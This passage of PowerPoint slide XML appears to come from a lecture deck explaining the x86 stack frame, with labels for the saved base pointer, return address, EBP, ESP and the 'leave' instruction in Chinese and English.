          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A206BB8E-36BC-2D4D-8AF3-C1B1F865A20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651152" y="3185392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kumimoji="1" lang="zh-TW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zh-TW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7" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC633CF4-6D01-604A-974B-43E9B4093DD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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30" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7458885-ED16-4857-A12D-6CEA3C6AF990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="3587041"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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8FFDA6FF-A0B4-4A09-BF8C-377D0DC0E11C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3732622"/>
            <a:ext cx="680313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2139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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689130" y="4407214"/>
            <a:ext cx="21405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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572692" y="4425309"/>
            <a:ext cx="34863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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>  退出子程式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>指令等於：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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err="1"/>
              <a:t>esp,ebp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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>存入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C010FA-E058-CB49-BAD0-07FBCD4C4076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931023" y="4421830"/>
            <a:ext cx="2384437" cy="916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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600F4C94-7AF7-4045-8DC2-AF3E06899A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9506915" y="4675086"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF892013-7C7E-0C43-A0A8-94225EBFB897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10054482" y="4445419"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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436A5F3-3D52-434F-90C0-1A2CA0BEA097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651153" y="3697722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kumimoji="1" lang="zh-TW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zh-TW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15" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1621536" y="5039405"/>
            <a:ext cx="2067594" cy="386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正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2E3E11-A43E-E14A-905E-3BEC45C9F06A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651152" y="3185392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int</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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zh-TW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7" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECCADD39-3CFD-C04C-9F75-DE6AC33327A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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9" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD1906E7-3FA4-45CD-A210-026C5063A17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="3587041"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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55803250-89ED-4DC1-99DE-2F87F7DB07AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3732622"/>
            <a:ext cx="680313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8687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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3514385" y="5415313"/>
            <a:ext cx="2532888" cy="8757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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3676979" y="5415313"/>
            <a:ext cx="21064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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783466" y="5572674"/>
            <a:ext cx="1929388" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572692" y="4425309"/>
            <a:ext cx="33609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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>  退出子程式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>指令等於：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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err="1"/>
              <a:t>esp,ebp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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>存入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C010FA-E058-CB49-BAD0-07FBCD4C4076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931023" y="4421830"/>
            <a:ext cx="2384437" cy="916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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600F4C94-7AF7-4045-8DC2-AF3E06899A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9506915" y="4675086"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF892013-7C7E-0C43-A0A8-94225EBFB897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10054482" y="4445419"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597152" y="5415314"/>
            <a:ext cx="2106487" cy="1573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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76BA9CE2-ED46-429B-9B53-C64379BD63F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="3587041"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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669C23CE-609A-449D-96D2-60C037EFCE20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3732622"/>
            <a:ext cx="680313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613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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
